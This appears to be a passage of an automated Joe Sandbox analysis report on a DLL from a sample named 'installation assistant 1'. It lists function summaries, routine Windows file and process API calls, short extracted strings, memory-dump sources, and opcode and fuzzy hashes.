                                          • API String ID: 0-4022487301
                                          • Opcode ID: 417339a48ad5e7cbd11a757a102a14a98610325138f01722d3f6ec034a937ea0
                                          • Instruction ID: 859a4c8dfddbb61d4f945fdddf7404070b054a7f3686e3e35301a862bd8c8e5e
                                          • Opcode Fuzzy Hash: 417339a48ad5e7cbd11a757a102a14a98610325138f01722d3f6ec034a937ea0
                                          • Instruction Fuzzy Hash: 11C1E770E042499FDF01EF99C880BADBBB5BF4E318F908159E510A7741E7709975CB68

                                          Control-flow Graph (rendered figure; legend: Executed / Not Executed; edge list omitted). API calls shown on the graph: GetFileType, GetLastError, CloseHandle.
                                          APIs
                                            • Part of subcall function 6CC64457: CreateFileW.KERNEL32(00000000,00000000,?,6CC64115,?,?,00000000,?,6CC64115,00000000,0000000C), ref: 6CC64474
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC64180
                                          • __dosmaperr.LIBCMT ref: 6CC64187
                                          • GetFileType.KERNEL32(00000000), ref: 6CC64193
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC6419D
                                          • __dosmaperr.LIBCMT ref: 6CC641A6
                                          • CloseHandle.KERNEL32(00000000), ref: 6CC641C6
                                          • CloseHandle.KERNEL32(6CC5B0D0), ref: 6CC64313
                                          • GetLastError.KERNEL32 ref: 6CC64345
                                          • __dosmaperr.LIBCMT ref: 6CC6434C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: 8Q
                                          • API String ID: 4237864984-4022487301
                                          • Opcode ID: 22c9245c1b7ac6d43633823e771d40559260fd7c92000cd67f4e94090fb9be63
                                          • Instruction ID: 70566220a4d38e78cbd8353cc0c6e1abafd8b28a73aaab4946b8673118ac61cc
                                          • Opcode Fuzzy Hash: 22c9245c1b7ac6d43633823e771d40559260fd7c92000cd67f4e94090fb9be63
                                          • Instruction Fuzzy Hash: 51A15932A041549FDF09DF79C9A1BAE7BB1EB07328F184259E811EFB81E7358816CB51

                                          Control-flow Graph (rendered figure; legend: Executed / Not Executed; edge list omitted). API calls shown on the graph: WriteFile, ReadFile.
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: :uW$;uW$;uW$> 4!$> 4!
                                          • API String ID: 0-4100612575
                                          • Opcode ID: b21a4866ef943ecad1d4f61bcce33648fcd0ac89705faf819a04bd99fa39eaa2
                                          • Instruction ID: 625e26f02112b195d7caade03ad8043ebdcc132ec24c399fc560a5da5d454c12
                                          • Opcode Fuzzy Hash: b21a4866ef943ecad1d4f61bcce33648fcd0ac89705faf819a04bd99fa39eaa2
                                          • Instruction Fuzzy Hash: 57716FB020C345AFD710DF56C480B9ABBF4FF8A708F10492EF598D6A51E775D848AB92
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2323437727.000000006CAC1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CAC0000, based on PE: true
                                          • Associated: 00000006.00000002.2323412575.000000006CAC0000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324901705.000000006CC68000.00000002.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2326730620.000000006CE32000.00000002.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: K?Jo$K?Jo$`Rlx$7eO
                                          • API String ID: 0-174837320
                                          Similarity
                                          • API ID:
                                          • String ID: ;T55
                                          • API String ID: 0-2572755013
                                          Control-flow Graph: function 6cc44ff0 (CreateProcessA, WaitForSingleObject, CloseHandle)
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID: D
                                          • API String ID: 963392458-2746444292
                                          Control-flow Graph: function 6cc5bc5e (WriteFile, GetLastError)
                                          APIs
                                            • Part of subcall function 6CC5BEB1: GetConsoleCP.KERNEL32(?,6CC5B0D0,?), ref: 6CC5BEF9
                                          • WriteFile.KERNEL32(?,?,6CC646EC,00000000,00000000,?,00000000,00000000,6CC65AB6,00000000,00000000,?,00000000,6CC5B0D0,6CC646EC,00000000), ref: 6CC5BDAF
                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC646EC,6CC5B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC5BDB9
                                          • __dosmaperr.LIBCMT ref: 6CC5BDFE
                                          Similarity
                                          • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                          • String ID: 8Q
                                          • API String ID: 251514795-4022487301
                                          Control-flow Graph: function 6cc45b90
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC45D31
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 323602529-1866435925
                                          Control-flow Graph: function 6cc5b925 (CloseHandle, GetLastError)
                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,?,6CC6425F), ref: 6CC5B97B
                                          • GetLastError.KERNEL32(?,00000000,?,6CC6425F), ref: 6CC5B985
                                          • __dosmaperr.LIBCMT ref: 6CC5B9B0
                                          Similarity
                                          • API ID: CloseErrorHandleLast__dosmaperr
                                          • String ID:
                                          • API String ID: 2583163307-0
                                          Control-flow Graph: function 6cc50b9c
                                          Similarity
                                          • API ID:
                                          • String ID: 8Q
                                          • API String ID: 0-4022487301
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC45AB4
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CC45AF4
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_
                                          • String ID:
                                          • API String ID: 323602529-0
                                          APIs
                                          • GetLastError.KERNEL32(6CC76DD8,0000000C), ref: 6CC4EF52
                                          • ExitThread.KERNEL32 ref: 6CC4EF59
                                          Similarity
                                          • API ID: ErrorExitLastThread
                                          • String ID:
                                          • API String ID: 1611280651-0
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          APIs
                                          • CreateFileW.KERNEL32(00000000,00000000,?,6CC64115,?,?,00000000,?,6CC64115,00000000,0000000C), ref: 6CC64474
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6CCD84B1
                                            • Part of subcall function 6CCD993B: __EH_prolog.LIBCMT ref: 6CCD9940
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: 1$`)K$h)K
                                          • API String ID: 3519838083-3935664338
                                          • Opcode ID: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                          • Instruction ID: 1c9716099ac1add24ca84a6b263e2b9e6b4835ab343ff6afb04ea1425015286e
                                          • Opcode Fuzzy Hash: fb81dbfa73f61bd15ec69b15b7f2714c80bc06e5f8e59c27703e0bd61042d5ed
                                          • Instruction Fuzzy Hash: 05F29D74D00248DFDB11CFA8C894BDDBBB5AF49308F254099E549AB781EB31AE85CF61
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6CCCAEF4
                                            • Part of subcall function 6CCCE622: __EH_prolog.LIBCMT ref: 6CCCE627
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $h%K
                                          • API String ID: 3519838083-1737110039
                                          • Opcode ID: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                          • Instruction ID: 46c4badc4af2628398f878e73d0f1fed322e5c9e282c17d7481241301d5fe8e3
                                          • Opcode Fuzzy Hash: 17cf35b80b03fcff345a605a7a63ea6e65b0b9a8420bc989c8341716572d16e6
                                          • Instruction Fuzzy Hash: AE538A70E01259DFDB15CFA4C994BEDBBB4AF09308F1440D9D449A7691EB30AE89CF62
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: $J
                                          • API String ID: 3519838083-1755042146
                                          • Opcode ID: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                          • Instruction ID: b523b5ebfc43b04733cd011ea95354acf772082899a1943628483dca0a51e721
                                          • Opcode Fuzzy Hash: bc8a295356575513f6860aba7bf9c3ae3d8e4be31f89be339654daa28ae8d27d
                                          • Instruction Fuzzy Hash: 9DE2BE70D05249DFEF01CFA8C884BDEBBB4AF05308F258099E955AB681EB74E945CF61
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6CCA6CE5
                                            • Part of subcall function 6CC7CC2A: __EH_prolog.LIBCMT ref: 6CC7CC2F
                                            • Part of subcall function 6CC7E6A6: __EH_prolog.LIBCMT ref: 6CC7E6AB
                                            • Part of subcall function 6CCA6A0E: __EH_prolog.LIBCMT ref: 6CCA6A13
                                            • Part of subcall function 6CCA6837: __EH_prolog.LIBCMT ref: 6CCA683C
                                            • Part of subcall function 6CCAA143: __EH_prolog.LIBCMT ref: 6CCAA148
                                            • Part of subcall function 6CCAA143: ctype.LIBCPMT ref: 6CCAA16C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog$ctype
                                          • String ID:
                                          • API String ID: 1039218491-3916222277
                                          • Opcode ID: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                          • Instruction ID: 0c0c1f18f0fdf7bb1f8352f04b4b789232dd1390b4e99c21e5c7cbc2a725df09
                                          • Opcode Fuzzy Hash: 905438d877a3164863332086eaa33768b02ac55e5ee0ef1456ae7a8ba4df0a90
                                          • Instruction Fuzzy Hash: 7403AF3080528ADFDF25DFE4C958BDCBBB0AF15308F144099D44967A91EB349B8ADF61
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 3J$`/J$`1J$p0J
                                          • API String ID: 0-2826663437
                                          • Opcode ID: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                          • Instruction ID: 0b5fc7b8fbfa5c16925416e32c6b2c3b1486682f66005efff07c31d1b2ffb8d9
                                          • Opcode Fuzzy Hash: 0ce0cf568756059b319bec402cc4c845d2048d3ed56d6c8deb0de92fa915ba20
                                          • Instruction Fuzzy Hash: FC412A71F109601AF3488F3A9C845667FC3C7CA346B4AC23DD565C7AD9EA7DC40782A4
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: W
                                          • API String ID: 3519838083-655174618
                                          • Opcode ID: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                          • Instruction ID: 889c570854033b64f5d9b0e6123db314eb8f084f12c16cc71e4c168891650d48
                                          • Opcode Fuzzy Hash: ea00faa881669fc0c82860575f49db2074e6a46241474c433f0857494c018303
                                          • Instruction Fuzzy Hash: A7B29870A01299DFDB00CFA8C488B9EBBB4BF49318F254099E945EB752E775ED41CB60
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 6CCC489B
                                            • Part of subcall function 6CCC5FC9: __EH_prolog.LIBCMT ref: 6CCC5FCE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: @ K
                                          • API String ID: 3519838083-4216449128
                                          • Opcode ID: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                          • Instruction ID: 1d46b6120aa66cbf64568ef97bec56d9dea089f8bd1aa4e58abb05d42931f011
                                          • Opcode Fuzzy Hash: 2aafbb27e948f5792f5f0ae65a5e3f4f4742fa89f16e976c1927d8ca4eeab830
                                          • Instruction Fuzzy Hash: F9D1FF31F046148BDB14CFA4C490BEEB7B6FF94318F14C16AE415ABA94EB749885CB26
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID: x=J
                                          • API String ID: 3519838083-1497497802
                                          • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                          • Instruction ID: 5a979bc5636ba6cf4bd041a0d5b4f2ff51af7890d93f89a89beb91433429f6b6
                                          • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                          • Instruction Fuzzy Hash: A291F331D111099BCF24DFA5C8949EDBB75FF46318F20806AD462B7A60FB32598ACB70
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                          • Instruction ID: c400ae3eddc6a7b114c076c6c799f85c3257e9531146cb20271b4f17d219aedc
                                          • Opcode Fuzzy Hash: 9c3421dad5d14781272ec358f91f3a3ab5cfaafabcf0205709a2c9463218eeaf
                                          • Instruction Fuzzy Hash: 0CB2DC30904759CFDB21CF69C4A4BDEBBF1BF0A308F144199D49AA7A91EB70A985CF50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @4J$DsL
                                          • API String ID: 0-2004129199
                                          • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                          • Instruction ID: 8f454ea88a85c2af38888af7eaa4527f185056d22f0233e1d37b6a3ba75c86d1
                                          • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                          • Instruction Fuzzy Hash: D12191376A49564BE74CCA28EC33EB92681E744305B88527EE94BCB7E1DF5C8800C648
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: H_prolog
                                          • String ID:
                                          • API String ID: 3519838083-0
                                          • Opcode ID: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                          • Instruction ID: 71fb038d3299afade56020783932a6890ab83b502e21f684408aef7994ff62fb
                                          • Opcode Fuzzy Hash: a09d6e82890587311bf3c607534608c3e0df372b1a8eae7fe7b1a33e2057bb73
                                          • Instruction Fuzzy Hash: 7BF13970A00249DFCB14CFA4C594BEEBBB1FF05318F14816ED419ABA52E770AA59CF52
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                          • Instruction ID: d5f2744cdcd00270684fe376ec97dbbf6189247a28940e2cddecd6e14bf7f219
                                          • Opcode Fuzzy Hash: b70bb84cdfed215badc6c0dc16625fe684c20b396c3ab56e614d7a8a82e34842
                                          • Instruction Fuzzy Hash: D9324AB1A083058FC318CF56C48495AF7E2BFCC314F468A5DE98997355DB74AA09CF86
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                          • Instruction ID: c3aff54c29ad94069d0aa6193e85d030b50b56af9b041a3fa6c09dd1d76ef49b
                                          • Opcode Fuzzy Hash: f76254a8391bbbc56ee5761849d9b464ca1ca2a3d131f1b477d5a7e0a80fcda2
                                          • Instruction Fuzzy Hash: 6712F6B29083158FC358DF4AD44045BF7E2BFC8714F1A8A6EF898A7311D770E9568B86
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID: __aullrem
                                          • String ID:
                                          • API String ID: 3758378126-0
                                          • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                          • Instruction ID: 9b5d763a8e1de61f914896f38eb40d1efdea3af27e048290acc82cd0fb35c18f
                                          • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                          • Instruction Fuzzy Hash: 6851D971A092859BD710CF5AC4C06EEFFE6EF79214F14C05EE8C897242E27A599AC760
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3916222277
                                          • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                          • Instruction ID: ddc66d8803a9bf74850c9161d251f171a9d7e44bcd592a8468364d116bb5208f
                                          • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                          • Instruction Fuzzy Hash: C20289316093818BD725CF28C49079EFBE2AFC8318F144A2DE4E597B51E775D94ACB82
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                          • Instruction ID: 405cf17217b0fa6c14e29a5f79d75bdc45dd4dc82f58e46548ed8627d1a3c537
                                          • Opcode Fuzzy Hash: b4ce60841bca8fd945d7956f1acfe73c36a86ce5a82225692ce6a5b8030d2b38
                                          • Instruction Fuzzy Hash: B3D13E729083148FC758DF4AD44005BF7E2BFC8314F1A892EF899A7315DB70A9568BC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (SL
                                          • API String ID: 0-669240678
                                          • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                          • Instruction ID: 8670d6828087e79a8a596ccebab55d1ba6a8a8c6b5d0f1aa69fd4adb185a350b
                                          • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                          • Instruction Fuzzy Hash: D5518373E208214AD78CCE24DC2177572D2E784310F8AC1B99D8BAB6E6DD789890C7D4
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
                                          • Associated: 00000006.00000002.2325800706.000000006CD49000.00000020.00000001.01000000.00000009.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6cac0000_#U5b89#U88c5#U52a9#U624b1.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                          • Instruction ID: 2d4b73a08a42ff3153823631e932d477a91ae17804f39cba0da759631c645793
                                          • Opcode Fuzzy Hash: c5d8fce23cbaa16ca4a411120887c85bd9f222070fcab5a8c777e9c9c2b1bfe3
                                          • Instruction Fuzzy Hash: 89726DB1A052168FD748CF18C490268FBE1FF89314B5A46ADD95ADB742EB31E895CBC0
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.2324967359.000000006CC78000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC78000, based on PE: true
                                          • Associated: 00000006.00000002.2325763516.000000006CD43000.00000004.00000001.01000000.00000009.sdmp
